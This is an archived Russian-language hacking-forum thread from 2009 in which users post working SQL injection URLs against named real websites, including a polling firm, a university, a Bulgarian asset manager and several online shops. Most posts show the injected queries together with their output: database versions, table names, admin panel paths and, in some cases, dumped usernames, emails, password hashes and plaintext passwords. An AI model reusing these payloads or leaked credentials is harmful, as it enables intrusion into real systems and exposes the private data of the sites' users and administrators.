ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9121  
Старый 02.05.2009, 16:40
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

mssql-inj
version
Код:
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=@@version--
db_name
Код:
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+db_name())--
system_user
Код:
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+system_user)--
tables
Код:
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('Poll','AdminVerify','dtproperties','sysconstraints','syssegments'))--
columns of table AdminVerify
Код:
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+column_name+from++information_schema.columns+where+table_name='AdminVerify'+and+column_name+not+in+('AdminName','AdminPassword'))--
Data acquisition
Код:
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+cast(AdminName+as+nvarchar)%2B%27%3A%27%2Bcast(AdminPassword+as+nvarchar)+from+AdminVerify)--
 
Ответить с цитированием

  #9122  
Старый 02.05.2009, 17:58
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

ПР5
http://cala.arizona.edu/events/eventdetails.php?id=-66+union+select+1,2,3,table_name,5,6,7,8,9,10+from +information_schema.tables+limit+25,100/*
таблицы:
password
users

пассы:
structure
foundation
skemoody@email.arizona.edu
utrecht
aquafina
raspberry
satellite
 
Ответить с цитированием

  #9123  
Старый 02.05.2009, 18:30
erihtoney
Познающий
Регистрация: 03.03.2009
Сообщений: 86
Провел на форуме:
994199

Репутация: 258
Отправить сообщение для erihtoney с помощью ICQ
По умолчанию

MSSQL
Код:
http://www.communication.go.ke/news.asp?id=93+union+select+1,2,3
,4,5,6,7,8+from+users
 
Ответить с цитированием

  #9124  
Старый 02.05.2009, 19:13
Rav1n
Познающий
Регистрация: 05.11.2008
Сообщений: 92
Провел на форуме:
1562063

Репутация: 149
По умолчанию

Код:
http://www.cherkov.org.ua/dis.php?nid=-5+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4#
5.0.41-community:f4ltdcom_cherkov:f4ltdcom_vadim@localhos t

tables:
Код:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,test_anti,test_boxing,test_duel,test_enews,test_fightart,test_ganswer,test_guest,test_guns,test_health,t
_______________________

Код:
http://kolesaonline.ru/diski_view.php?code=-20210054+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12--
4.1.22-log:kolesa:kolesa-sql@localhost
_______________________

Код:
http://www.crmru.info/library_article_view.php?article_id=7+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11--

4.0.27-log:micro:micro@195.242.3.251
 
Ответить с цитированием

  #9125  
Старый 02.05.2009, 21:11
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
Отправить сообщение для Dimionx с помощью ICQ
По умолчанию

www.cosmicscoffee.com

Код:
http://www.cosmicscoffee.com/shops.php?cid=-611+union+select+1,2,3,concat_ws(0x3a,version(),user(),database())
Версия - 5.0.45:
Юзер - cosmicscof@localhost:
БД - cosmicscoffee

Табличка administrators

Код:
http://www.cosmicscoffee.com/shops.php?cid=-611+union+select+1,2,3,concat_ws(0x3b,user_name,user_password)+from+administrators
Код:
kitchen;ac3a02e36381e883d05901ab270d6e80:63
 
Ответить с цитированием

  #9126  
Старый 03.05.2009, 01:16
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://fabernet.com.ua/news?id=-2+union+select+1,2,3,4,5--
Database Version: 4.1.22-standard-log
Database name: fabernet_fabernet
User name: fabernet_faber@localhost

Админка:
http://fabernet.com.ua/admin


Цитата:
http://silouette.com.ua/news?id=-2+union+select+1,2,3,4,5--
Database Version: 5.0.67
Database name: silouette
User name: silouette@localhost

price_comments

Админка:
http://silouette.com.ua/admin


Цитата:
http://plastivka.com.ua/news?id=-2+union+select+1,2,3,4,5--
Database Version: 5.0.67
Database name: lastivka
User name: lastivka@localhost

Админка:
http://plastivka.com.ua/admin


Цитата:
http://expertise.in.ua/news?id=-2+union+select+1,2,3,4,5--
Database Version: 5.0.67
Database name: expertise
User name: expertise@localhost

Админка:
http://expertise.in.ua/admin
 
Ответить с цитированием

  #9127  
Старый 03.05.2009, 05:03
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Raiffeisen ASSET MANAGEMENT (Bulgaria)
Цитата:
http://ram.bg/bg/fund1'+and+substring(version(),1,1)=5--+
5ая ветка
user() = root@localhost

Головной центр предлицензионной подготовки
Цитата:
http://gcpp.ru/?id=1139+union+select+1,concat_ws(0x3a,database(), user(),version()),3,4,5,6,7,8,9,10,11/*
Код:
gcpp_cert:gcpp_gcpp@localhost:4.1.22-standard
Цитата:
http://gcpp.ru/?id=1139+union+select+1,concat_ws(0x3a,name,passwo rd),3,4,5,6,7,8,9,10,11+from+user/*
Код:
adm:tbontbtitq
oper:yrepa00
user:yyy123
 
Ответить с цитированием

  #9128  
Старый 03.05.2009, 08:30
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию

Target: www.omwy.cc

Evil link: http://www.omwy.cc/en/news.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database()),6

Info:
Version: 4.1.12
User: oumeiceramic_f@localhost
Database: oumeiceramic
 
Ответить с цитированием

  #9129  
Старый 03.05.2009, 09:19
BlackPanther
Новичок
Регистрация: 19.04.2009
Сообщений: 15
Провел на форуме:
139497

Репутация: 10
По умолчанию

SQL -
Код:
http://www.nadona.org/calendar.php?id=-22+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),3,4,5,6,7,8--
nadona_sql@localhost : nadona_admin : 5.0.27-standard
Поскольку версия больше 5 узнаем таблицы....
Код:
http://www.nadona.org/calendar.php?id=-22+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),GROUP_CONCAT(0x3a,0x3a,table_name),4,5,6,7,8+from+information_schema.tables--
 
Ответить с цитированием

  #9130  
Старый 03.05.2009, 11:49
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Какойто китайский шоп...
taiwanrice.com
Код:
http://taiwanrice.com/upload/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8/*
tinwhang@localhost:ecshop:5.0.45
Код:
http://taiwanrice.com/upload/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,table_name,8%20from%20information_schema.tables+limit+1,1/*
44 таблицы

Код:
http://taiwanrice.com/upload/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat_ws(0x3a,user_name,password),8%20from%20ecs_users/*
юзвери:
Код:
email,login,hash,password
888@go56.net,6hth,924c38132b75ff3dccb94114f5326e8
lny2307@yahoo.com.tw,lny2307,ef3592f32a1c28b572c2014ffb0910b0:655411
wanhsin.li@msa.hinet.net,wendy, 0e0a6a1e3566821e6117746aa2a2ff72
katty-cheng@umail.hinet.net, 陳妍如, 576966f758ceee75f38271489ef7e839:841009
jean5202000@yahoo.com.tw,jean5202000, 26be9bb4e49df2e9742056e54db12789
ecs_admin_user
Код:
'tinwhang', '888@go56.net', 'f50ea380584f8fa388cf45bc5366f3fa:inmine00'
PR:0
тиц:0
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ